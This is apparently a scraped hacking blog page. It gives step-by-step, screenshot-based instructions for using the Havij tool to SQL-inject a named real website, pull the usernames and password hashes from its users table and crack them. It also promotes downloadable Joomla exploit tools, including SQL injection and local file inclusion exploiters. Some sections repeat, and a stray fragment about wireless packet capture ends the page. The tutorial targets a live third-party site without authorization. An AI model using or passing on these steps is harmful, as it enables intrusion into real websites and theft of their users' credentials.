![[Image: 6.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXSwO0TzhmlIvj_V-L-822Z1_acGhueGk5Sx0Fr2umr5H8tcaumfsRnnORkDu53vsb5iDu17eDsgBYdrxz0eh9avx3ONU3ZIiZf-nhDS6wgp7QHMBrDGOHRLN_9w5txYsfNj-ttItTiM8/s400/6.jpg)
Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...
![[Image: 7.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCrg1kLLqDzV-wcsdgpnrWETTHOqEPToiPOm6pTwTeC7EAnHiMZ6G3OLf2I6VghtLXiMxPRhotGzY9v46pvHbdSTrbBO1ohax-uUk4X9zrH_w6JkYXy08qMkzc-Z40J_StWQ7-FRqWtJ4/s400/7.jpg)
CLICK HERE like our FACEBOOK FAN PAGE !
Download havij 1.10
First Find a sqli infected site .Now here i found a vulernable site
http://www.hypetrading.com/productinfo.php?id=285
Now Let's start
Open havij and copy and paste infected link as shown in figure
Now Let's start
Open havij and copy and paste infected link as shown in figure
![[Image: 1.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNvNxxb0sUvAj_2KDIi6pwU7SQCjhdQiElbuHMTJM5rLTFCNYWKGVZGOk_Wq4zgmw9XXeYJK0BWCteXUw_E3HVRZXBz7yloMaTl7Sin5KsNKvXCMTrvCvSQ6DzrnIreOE7mD5_2j5M4YQ/s400/1.jpg)
Now click in the "Analyze"
![[Image: 2.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVxkAn6PsAycpgwRBUMG0DEthLkIqidhllaVnGSzN2EYmkfg4RdVYsa8-F_4oUdA8lUWNUceATVQEv8C7HKl3NLgg-ATnIgWvz4MVUjuXcpYMW78T4ITswFI80Gwy13GV65vfjkqf1z2o/s400/2.jpg)
Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx
![[Image: 3.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9ZZdjNZ5Q3GD_obQd7YmPnhW29UsaSutYZBOxaKvNAse_SjgcJNnaWe6MxyZFmLgxvNLi37LxVsMfu3gylBl9t7MWVCN42Yr1v9Mtw4AV2CeoVqG8hf1VHP0LIkYlUSwwyN1xnbamDLY/s400/3.jpg)
Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed
![[Image: 4.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzCAv66h0H9X_CoYNjkXtnbXkuGmQHiRc62wdB4_I0NzQplQl7THPWsoX8AfaUAoOUy6G-1Fwwj1WwVv6TaN_myP32NbpZq3WTaBD_tBO2RrJs_iV1V5O98q_fCtprO1KH1J7SFJ2mmYA/s400/4.jpg)
After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure
![[Image: 5.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhscwt1Ys824NIh7iV5rpM6kMywkRHfW6lkVr42uWg0fEKB26QUSqND9x7eGPzg_gbWK2VuFowZp9ceIyVX601imSjJvZReDYa0AumyG8Kilsjb2sJ_ftUT1rGPAQuZ6h7j_KDMjgXJXlE/s400/5.jpg)
In that Just put mark username and password and click "Get data"
![[Image: 6.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXSwO0TzhmlIvj_V-L-822Z1_acGhueGk5Sx0Fr2umr5H8tcaumfsRnnORkDu53vsb5iDu17eDsgBYdrxz0eh9avx3ONU3ZIiZf-nhDS6wgp7QHMBrDGOHRLN_9w5txYsfNj-ttItTiM8/s400/6.jpg)
Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...
![[Image: 7.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCrg1kLLqDzV-wcsdgpnrWETTHOqEPToiPOm6pTwTeC7EAnHiMZ6G3OLf2I6VghtLXiMxPRhotGzY9v46pvHbdSTrbBO1ohax-uUk4X9zrH_w6JkYXy08qMkzc-Z40J_StWQ7-FRqWtJ4/s400/7.jpg)
CLICK HERE like our FACEBOOK FAN PAGE !
Hacking JOOMLA websites !
Hacking JOOMLA websites !
#7 Simple Local File Inclusion Exploiter
Click to Download
The Simple Log File Analyzer could be used for scanning your Apache log files. It shows if there are hack attempts.
These tools can help you to exploit vulnerabilities within Joomla or some extensions.
NOTE: Read the help (included in those tools) for details.
If you like my this post then kindly Share with your friends and groups and hit like
Joomla Hacking Tools: Hack Joomla With Self-Written Tools By Valentin
Manual testing is awesome, but automated
checks are faster and maybe even more reliable. Here are some
self-written tools you could use for your purposes.
#1 Joomla QPersonel Exploit :
#2 Automated Joomla SQL Injection Exploiter
#3 Joomla BF Quiz Exploit
#4 Column Fuzzer
#5 Simple SQL Injection Vulnerability Scanner
#6 Simple Log File Analyzer
#7 Simple Local File Inclusion Exploiter
Click to Download
The Simple Log File Analyzer could be used for scanning your Apache log files. It shows if there are hack attempts.
These tools can help you to exploit vulnerabilities within Joomla or some extensions.
NOTE: Read the help (included in those tools) for details.
If you like my this post then kindly Share with your friends and groups and hit like
☛ Connect With us on Facebook.
Subscribe to:
Posts (Atom)











.jpg)


. you need around 400,000 packets depending on how secure the network is. you might need more.